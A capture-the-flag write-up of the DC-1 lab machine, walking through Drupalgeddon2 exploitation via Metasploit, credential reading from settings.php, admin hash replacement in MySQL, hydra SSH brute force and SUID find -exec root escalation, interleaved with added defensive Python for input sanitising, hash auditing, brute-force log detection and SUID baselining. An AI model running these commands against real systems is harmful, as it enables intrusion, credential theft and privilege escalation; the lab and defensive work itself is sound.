DC-1 Target Machine Write-up

Enumerate the host with nmap:

```
nmap -A ip -sV -vv
```

Relevant findings:

```
80  http  Apache/2.2.22
22  ssh   OpenSSH 6.0p1 Debian 4+deb7u7
CMS: Drupal 7
```
Search for a matching module in MSF:

```
search Drupal 7.x
```

```
Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_drupalgeddon2  2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
```
Select module 0 and set the target IP:

```
use 0
set rhost ip
```

The exploit runs successfully; drop from meterpreter to a shell:

```
meterpreter > shell
Process 3333 created.
```
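The module above targets Forms API property injection, and the corresponding fix on the defender's side is input sanitisation: Drupal's SA-CORE-2018-002 patch strips any request parameter whose name begins with `#` (a Forms API property name) before the form system sees it, and logs the removal. The following is an added example, not code from this write-up or from Drupal, that reproduces that sanitising step in Python over a PHP-style form body; the sample body and the `#anything` key are constructed.

```python
# Added example (not Drupal's code, not from the write-up): reproduce, in Python,
# the request-sanitising step Drupal introduced in the SA-CORE-2018-002 fix for
# Drupalgeddon 2 -- any request parameter whose name starts with '#' (a Forms API
# property name) is dropped before the form system sees it, and the removal is logged.
from urllib.parse import parse_qs


def parse_php_style_form(body):
    """Decode 'a[b][c]=v' style bodies into nested dicts, the way PHP fills $_POST."""
    result = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        parts = key.replace("]", "").split("[")
        for value in values:
            node = result
            for part in parts[:-1]:
                node = node.setdefault(part, {})
            # '[]' appends with the next numeric index, as PHP does
            last = parts[-1] if parts[-1] != "" else str(len(node))
            node[last] = value
    return result


def sanitize_input(data, allowlist=(), _path="", _removed=None):
    """Recursively drop '#'-prefixed keys; returns (clean_data, removed_key_paths)."""
    removed = [] if _removed is None else _removed
    if not isinstance(data, dict):
        return data, removed
    clean = {}
    for key, value in data.items():
        if key.startswith("#") and key not in allowlist:
            removed.append(_path + key)      # what a real deployment should log
            continue
        clean[key], _ = sanitize_input(value, allowlist, _path + key + "/", removed)
    return clean, removed


def sanitize_request_body(body, allowlist=()):
    """Convenience wrapper: raw form body in, (clean nested dict, removed paths) out."""
    return sanitize_input(parse_php_style_form(body), allowlist)


# Constructed sample body: an ordinary form submission plus one injected Forms API
# property name nested under the 'mail' field. The '#anything' key is made up.
SAMPLE_BODY = "name=alice&mail[#anything]=injected&mail[value]=alice@example.test&timezone=UTC"

if __name__ == "__main__":
    clean, removed = sanitize_request_body(SAMPLE_BODY)
    print("sanitised:", clean)
    print("removed:  ", removed)
```

The `allowlist` parameter exists because a site may legitimately accept a `#`-prefixed key in some custom form; every removal should be logged so the same event that blocks an attempt also produces a detection signal.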
Upgrade to an interactive shell with Python's pty module:

```
python -c "import pty;pty.spawn('/bin/bash')"
```

Check the current user:

```
www-data@DC-1:/var/www$ whoami
www-data
```

List the current directory:

```
www-data@DC-1:/var/www$ ls
COPYRIGHT.txt       LICENSE.txt      cron.php     misc        sites
INSTALL.mysql.txt   MAINTAINERS.txt  flag1.txt    modules     themes
INSTALL.pgsql.txt   README.txt       includes     profiles    update.php
INSTALL.sqlite.txt  UPGRADE.txt      index.php    robots.txt  web.config
INSTALL.txt         authorize.php    install.php  scripts     xmlrpc.php
```

flag1 is right there:

```
www-data@DC-1:/var/www$ cat flag1.txt
Every good CMS needs a config file - and so do you
```
flag1 suggests flag2 has something to do with the CMS configuration file. Searching the tree turns up Drupal's settings file, which contains flag2 along with the database credentials:

```
www-data@DC-1:/var/www/sites/default$ cat settings.php
```

```php
<?php
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
?>
```
Following the flag2 hint, log in to the database with those credentials:

```
www-data@DC-1:/var/www$ mysql -u dbuser -pR0ck3t
```

```
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 49
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

mysql> usr drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)
```
There is a users table; dump it:

```
mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
```
The passwords are salted hashes and did not crack. Looking around, the CMS ships a script that generates a salted hash for a given password:

```
www-data@DC-1:/var/www$ php scripts/password-hash.sh admin

password: admin 		hash: $S$DeMqLQwGP7RNQNFSEqHSTU82D/3fanHo3g.MK1a6JMBXjqU.7lyt
```

Replace the admin user's hash with the generated one, so the password becomes `admin`:

```
mysql> update users set pass="$S$DeMqLQwGP7RNQNFSEqHSTU82D/3fanHo3g.MK1a6JMBXjqU.7lyt" where uid=1;
Query OK, 1 row affected (0.01 sec)
Rows matched: 1  Changed: 1  Warnings: 0
```
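Why the dump above did not crack quickly: Drupal 7 stores `$S$`, one cost character, an 8-character salt and 43 characters of phpass-style base64 over an iterated SHA-512 digest, and the cost character's index in the phpass alphabet is log2 of the round count, so the `$S$D` prefix on both rows means 2^15 rounds with a per-user salt. The following is an added example, not code from this write-up or from Drupal, that audits a `users.pass` column for hashes that fall short of that: unsalted Drupal 6 MD5 leftovers, MD5-derived upgraded hashes and low round counts. The first two sample rows are the hashes shown above; the others are constructed.

```python
# Added example (not Drupal's code, not from the write-up): audit the hashes stored in
# Drupal 7's users.pass column. Drupal 7 stores "$S$" + one cost character + an 8-char
# salt + 43 chars of phpass-style base64 over an iterated SHA-512 digest; the cost
# character's index in the phpass alphabet is log2 of the round count, so "$S$D" means
# 2^15 rounds. Unsalted 32-hex MD5 values are Drupal 6 leftovers.
import re

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55
DRUPAL_DEFAULT_LOG2 = 15   # Drupal 7's DRUPAL_HASH_COUNT


def parse_drupal_hash(stored):
    """Describe one users.pass value, or return None if the format is unrecognised."""
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        return {"scheme": "md5-legacy", "salted": False, "log2_rounds": 0, "salt": ""}
    upgraded = stored.startswith("U$S$")   # D6 MD5 re-wrapped in SHA-512 on upgrade
    if upgraded:
        stored = stored[1:]
    if len(stored) != DRUPAL_HASH_LENGTH or not stored.startswith("$S$"):
        return None
    log2 = ITOA64.find(stored[3])
    if log2 < 0:
        return None
    return {"scheme": "sha512-over-md5" if upgraded else "sha512",
            "salted": True, "log2_rounds": log2, "salt": stored[4:12]}


def audit_hashes(rows, min_log2=DRUPAL_DEFAULT_LOG2):
    """rows: (name, pass) pairs. Returns (name, finding) for every row that needs attention."""
    findings = []
    for name, stored in rows:
        info = parse_drupal_hash(stored)
        if info is None:
            findings.append((name, "unrecognised hash format"))
        elif not info["salted"]:
            findings.append((name, "unsalted legacy MD5 hash"))
        elif info["scheme"] == "sha512-over-md5":
            findings.append((name, "MD5-derived hash, force a password reset"))
        elif info["log2_rounds"] < min_log2:
            findings.append((name, f"cost 2^{info['log2_rounds']} below policy minimum 2^{min_log2}"))
    return findings


# The first two rows are the hashes from the users dump above; the rest are constructed.
SAMPLE_ROWS = [
    ("admin", "$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR"),
    ("Fred", "$S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg"),
    ("legacy", "5f4dcc3b5aa765d61d8327deb882cf99"),             # constructed: Drupal 6 style MD5
    ("lowcost", "$S$" + ITOA64[7] + "abcdefgh" + "x" * 43),      # constructed: only 2^7 rounds
    ("broken", "not-a-hash"),                                     # constructed
]

if __name__ == "__main__":
    for name, finding in audit_hashes(SAMPLE_ROWS):
        print(f"{name}: {finding}")
```

Run against a real `users` table, this is a quick way to spot accounts whose hashes predate the current cost policy; the `min_log2` argument lets the policy be raised above Drupal's default.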
Log in to the site as admin / admin and flag3 appears:

```
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
```

Read loosely, the hint says the next flag has to do with passwd:

```
www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
```
A flag4 user exists; try brute-forcing its SSH password with a wordlist:

```
hydra -l flag4 -P /usr/share/john/password.lst ssh://ip
```

```
[22][ssh] host: 172.16.27.58   login: flag4   password: orange
```
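A wordlist run like the one above leaves a very characteristic trail in the target's `auth.log`: a burst of `Failed password` lines for one user from one source, usually followed by an `Accepted password` line once the guess lands. The following is an added example, not code from this write-up, that detects both patterns in Debian-style sshd log lines; the log lines are constructed, with `172.16.27.1` as a made-up source address and the year assumed to be 2019 because syslog timestamps carry none.

```python
# Added example (not from the write-up): detect SSH password-guessing bursts and
# "success after many failures" in sshd auth.log lines. Log lines are constructed.
import re
from collections import defaultdict
from datetime import datetime

# Debian-style sshd lines, e.g.
#   Feb 19 10:15:01 DC-1 sshd[1201]: Failed password for flag4 from 172.16.27.1 port 40001 ssh2
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def _parse(line, pattern, year):
    """Return (timestamp, user, ip) if the line matches pattern, else None."""
    m = pattern.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog has no year
    return ts, m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_seconds=60, year=2019):
    """Return {(ip, user): peak_failures} for pairs exceeding threshold failures in any window."""
    failures = defaultdict(list)
    for line in lines:
        ev = _parse(line, FAILED_RE, year)
        if ev:
            ts, user, ip = ev
            failures[(ip, user)].append(ts)
    alerts = {}
    for key, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):           # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[key] = max(alerts.get(key, 0), count)
    return alerts


def success_after_failures(lines, min_failures=5, year=2019):
    """(ip, user, prior_failures) for logins preceded by >= min_failures failures from that pair."""
    counts = defaultdict(int)
    hits = []
    for line in lines:                            # assumes lines are in log order
        ev = _parse(line, FAILED_RE, year)
        if ev:
            counts[(ev[2], ev[1])] += 1
            continue
        ev = _parse(line, ACCEPTED_RE, year)
        if ev and counts[(ev[2], ev[1])] >= min_failures:
            hits.append((ev[2], ev[1], counts[(ev[2], ev[1])]))
    return hits


# Constructed sample log: two stray failures spread over 40 minutes (not an attack),
# then eight failures in eight seconds for flag4 followed by a successful login.
SAMPLE_AUTH_LOG = [
    "Feb 19 09:00:00 DC-1 sshd[900]: Failed password for invalid user test from 10.0.0.5 port 5000 ssh2",
    "Feb 19 09:40:00 DC-1 sshd[901]: Failed password for invalid user test from 10.0.0.5 port 5001 ssh2",
] + [
    f"Feb 19 10:15:{s:02d} DC-1 sshd[{1200 + s}]: Failed password for flag4 from 172.16.27.1 port {40000 + s} ssh2"
    for s in range(1, 9)
] + [
    "Feb 19 10:15:09 DC-1 sshd[1209]: Accepted password for flag4 from 172.16.27.1 port 40009 ssh2",
]

if __name__ == "__main__":
    print("bursts:", detect_bruteforce(SAMPLE_AUTH_LOG))
    print("success after failures:", success_after_failures(SAMPLE_AUTH_LOG))
```

The second detector is the more valuable one: a burst that ends in an `Accepted` line is a compromised account, not just noise, and is what should page someone.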
Log in as flag4 with the password orange:

```
$ ssh flag4@172.16.27.58
flag4@172.16.27.58's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably.  But perhaps it's not that easy.  Or maybe it is?
```
Following the hint, try to escalate privileges. List the SUID files owned by root:

```
find / -user root -perm -4000 -print 2>/dev/null
```

```
www-data@DC-1:/var/www$ find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
```

find is SUID root, and its `-exec` option gives a way to escalate:

```
www-data@DC-1:/tmp$ find -exec /bin/sh \;
```
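The defender's side of the listing above is a SUID inventory: record the setuid-root binaries of a clean reference install once, then diff the live host against that baseline so a binary like `/usr/bin/find`, which is not setuid on a stock install, stands out immediately. The following is an added example, not code from this write-up; the `find` output above serves as the observed set, and the baseline is an assumption for illustration (everything observed except `/usr/bin/find`), not an authoritative Debian list.

```python
# Added example (not from the write-up): enumerate root-owned setuid binaries and diff
# them against an approved baseline. The baseline below is an assumption for
# illustration; a real one is recorded from a freshly installed reference system and
# stored off-host.
import os
import stat


def find_root_suid(root="/"):
    """Return sorted paths of regular files under root that are setuid and owned by uid 0."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)           # lstat: do not follow symlinks
            except OSError:
                continue                      # unreadable or gone, like 2>/dev/null above
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(found, baseline):
    """Setuid-root binaries present on the host but not in the approved baseline."""
    return sorted(set(found) - set(baseline))


def missing_suid(found, baseline):
    """Baseline entries that are no longer setuid root (can also indicate tampering)."""
    return sorted(set(baseline) - set(found))


# The find output from the write-up, as the observed set.
DC1_OBSERVED = [
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6", "/bin/umount",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/procmail", "/usr/bin/find", "/usr/sbin/exim4",
    "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/sbin/mount.nfs",
]

# Assumed baseline for illustration: everything observed except /usr/bin/find, which is
# never setuid on a stock install.
ASSUMED_BASELINE = [p for p in DC1_OBSERVED if p != "/usr/bin/find"]

if __name__ == "__main__":
    observed = find_root_suid("/")
    print("unexpected:", unexpected_suid(observed, ASSUMED_BASELINE))
    print("missing:   ", missing_suid(observed, ASSUMED_BASELINE))
```

Run periodically (or from a file-integrity job), the `unexpected` list is the one that matters: a setuid bit added to a general-purpose tool is a persistence and escalation path regardless of which tool it is.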
Escalation succeeded; look at the files under /root:

```
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
```